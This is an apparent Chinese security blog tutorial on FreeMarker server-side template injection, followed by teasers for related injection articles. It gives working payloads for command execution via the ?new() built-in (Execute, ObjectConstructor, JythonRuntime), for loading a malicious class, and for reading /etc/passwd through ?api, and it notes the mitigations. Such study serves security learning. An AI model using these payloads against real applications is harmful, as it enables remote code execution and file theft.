0x00 介绍

这里主要学习下 FreeMarker 模板注入，FreeMarker 是一款模板引擎，FreeMarker 模板文件与 HTML 一样都是静态页面，当用户访问页面时，FreeMarker 引擎会进行解析并动态替换模板中的内容进行渲染，然后将渲染后的结果返回到浏览器中。

0x01 FreeMarker 模板

FreeMarker 模板语言（FreeMarker Template Language，FTL）由 4 个部分组成，分别如下：

文本：包括 HTML 标签与静态文本等静态内容，该部分内容会原样输出
插值：这部分的输出会被模板引擎计算的值来替换，使用 ${} 这种语法
标签：和 HTML 标签类似，不会打印在输出的内容中，比如 <#assign name=‘bob’>
注释：和 HTML 注释类似，由 <#-- 和 --> 表示，注释部分的内容会 FreeMarker 忽略

以下是一个 FreeMarker 模板内容示例：

<html>
<head><title>Welcome TeamsSix!</title>
</head>
<body>　<#-- 这是注释 -->
<h1>Welcome !</h1>
<p>Our latest product:<a href="${latestProduct.url}">${latestProduct.name}</a>!
</body>
</html>

0x02 模板注入利用

1、new 函数的利用

FreeMarker 中预制了大量了内建函数，其中 new 函数可以创建一个继承自 freemarker.template.TemplateModel 类的变量，利用这一点能达到执行任意代码的目的。

利用方法一：

freemarker.template.utility 里有个 Execute 类，通过观察源代码里的第 30 行可以看到这个类会调用 Runtime.getRuntime().exec 函数执行它的 aExecute 变量参数值，因此这里可以使用 new 函数传输想要执行的命令作为 aExecute 参数值，从而执行命令。

freemarker.template.utility.Execute 部分文件代码如下：

22 public Object exec(List arguments) throws TemplateModelException {23    StringBuilder aOutputBuffer = new StringBuilder();
24    if (arguments.size() < 1) {25        throw new TemplateModelException("Need an argument to execute");
26    } else {27        String aExecute = (String)((String)arguments.get(0));
28
29        try {30            Process exec = Runtime.getRuntime().exec(aExecute);
31            InputStream execOut = exec.getInputStream();
32            Throwable var6 = null;

构造 payload 如下：

<#assign value="freemarker.template.utility.Execute"?new()>${value("open -a Calculator")}

利用方法二：

freemarker.template.utility 里有个 ObjectConstructor 类，通过观察源代码里的第 25 行可以看到这个类会把它的参数作为名称构造一个实例化对象。

因此也可以利用这一点构造一个可执行命令的对象，从而 RCE

freemarker.template.utility.ObjectConstructor 部分文件代码如下：

17 public class ObjectConstructor implements TemplateMethodModelEx {18     public ObjectConstructor() {19     }
20
21     public Object exec(List args) throws TemplateModelException {22         if (args.isEmpty()) {23             throw new TemplateModelException("This method must have at least one argument, the name of the class to instantiate.");
24         } else {25             String classname = args.get(0).toString();
26             Class cl = null;
27
28             try {29                 cl = ClassUtil.forName(classname);
30             } catch (Exception var6) {31                 throw new TemplateModelException(var6.getMessage());
32             }

构造 Payload 如下：

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","open","-a","Calculator").start()}

利用方法三：

freemarker.template.utility 里有个 JythonRuntime 类，这里可以通过自定义标签的方式执行 Python 命令，从而构造远程命令执行。

freemarker.template.utility.JythonRuntime 部分文件代码如下：

public class JythonRuntime extends PythonInterpreterimplements TemplateTransformModel {@Overridepublic Writer getWriter(final Writer out,final Map args) {final StringBuilder buf = new StringBuilder();final Environment env = Environment.getCurrentEnvironment();return new Writer() {@Overridepublic void write(char cbuf[], int off, int len) {buf.append(cbuf, off, len);}@Overridepublic void flush() throws IOException {interpretBuffer();out.flush();}@Overridepublic void close() {interpretBuffer();}private void interpretBuffer() {synchronized (JythonRuntime.this) {PyObject prevOut = systemState.stdout;try {setOut(out);set("env", env);exec(buf.toString());buf.setLength(0);} finally {setOut(prevOut);}}}};}
}

构造 Payload 如下：

<#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("open -a Calculator")</@value>

2、api 函数的利用

除了 new 函数，还可以利用 api 函数调用 Java API，然后通过 getClassLoader 获取类加载器从而加载恶意类，或者也可以通过 getResource 来实现任意文件读取。

加载恶意类的 Payload 如下：

<#assign classLoader=object?api.class.getClassLoader()>${classLoader.loadClass("Evil.class")}

任意文件读取的 Payload 如下：

<#assign uri=object?api.class.getResource("/").toURI()><#assign input=uri?api.create("file:///etc/passwd").toURL().openConnection()><#assign is=input?api.getInputStream()>FILE:[<#list 0..999999999 as _><#assign byte=is.read()><#if byte == -1><#break></#if>${byte}, </#list>]

不过 api 内建函数并不能随便使用，必须在配置项 apiBuiltinEnabled 为 true 时才有效，而该配置在 2.3.22 版本之后默认为 false

同时 FreeMarker 为了防御通过其他方式调用恶意方法，FreeMarker 内置了一份危险方法名单 unsafeMethods.properties，例如 getClassLoader、newInstance 等危险方法都被禁用了。

参考文章：

https://www.anquanke.com/post/id/215348

https://www.cnblogs.com/Eleven-Liu/p/12747908.html

原文链接：

https://www.teamssix.com/211203-200441.html

更多信息欢迎关注我的个人微信公众号：TeamsSix

【代码审计】模板注入相关推荐

Java安全-注入漏洞（SQL注入、命令注入、表达式注入、模板注入）
文章目录注入 SQL注入 JDBC拼接不当造成SQL注入框架使用不当造成SQL注入不安全的反射命令注入代码注入表达式注入 Spel表达式注入 OGNL表达式注入模板注入注入 SQL注入 ...
buuctf 刷题 6(WEB-INF/web.xmlSmarty模板注入py脚本编写)
[RoarCTF 2019]Easy Java 进去页面,得到一个登录框.因为题目是java,应该不是sql注入, 点开help,看见: filename参数可控 .没做过相应的java安全题目.看其 ...
WEB 渗透之SSTI 模板注入
SSTI 模板注入文章目录 SSTI 模板注入前言一.注入二.什么是 SSTI 模板注入三.产生原因四.常见的模板引擎五.相关属性六.检测方法七.攻击思路 1. 攻击方向 2. 漏洞 ...
apt_Word模板注入攻击
Word模板注入攻击 win7:192.168.137.139:第一部分实验所用win7 虚拟机 win7:192.168.1.102:第二部分实验所用win7 虚拟机 kaili:192.168.1 ...
confluence未授权模板注入/代码执行 cve-2019-3396
参考: https://jira.atlassian.com/browse/CONFSERVER-57974 https://github.com/knownsec/pocsuite3/blob/ma ...
cve-2019-11581 Atlassian Jira未授权服务端模板注入漏洞
漏洞描述 Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统.该系统主要用于对工作中各类问题.缺陷进行跟踪管理. Atlassian Jira Server和Jira ...
详解模板注入漏洞（下）
作者 | 原作者gosecure,翻译整理shan66 来源 | http://gosecure.github.io/ 在上一篇文章中,我们为读者详细介绍了模版注入漏洞的概念,模版引擎的识别方法,以及 ...
CVE-2021-29454——Smarty模板注入
漏洞报告 Smarty 是 PHP 的模板引擎,有助于将表示 (HTML/CSS) 与应用程序逻辑分离.在 3.1.42 和 4.0.2 版本之前,模板作者可以通过制作恶意数学字符串来运行任意 PHP ...
jinja2模板注入_Flask jinja2 模板注入思路总结
Flask jinja2 模板注入思路总结前言虽然这个漏洞已经出现很久了, 不过偶尔还是能够看到翻了翻 freebuf 上好像只有 python2 的一些 payload, 方法也不是很全我找来找 ...

【代码审计】模板注入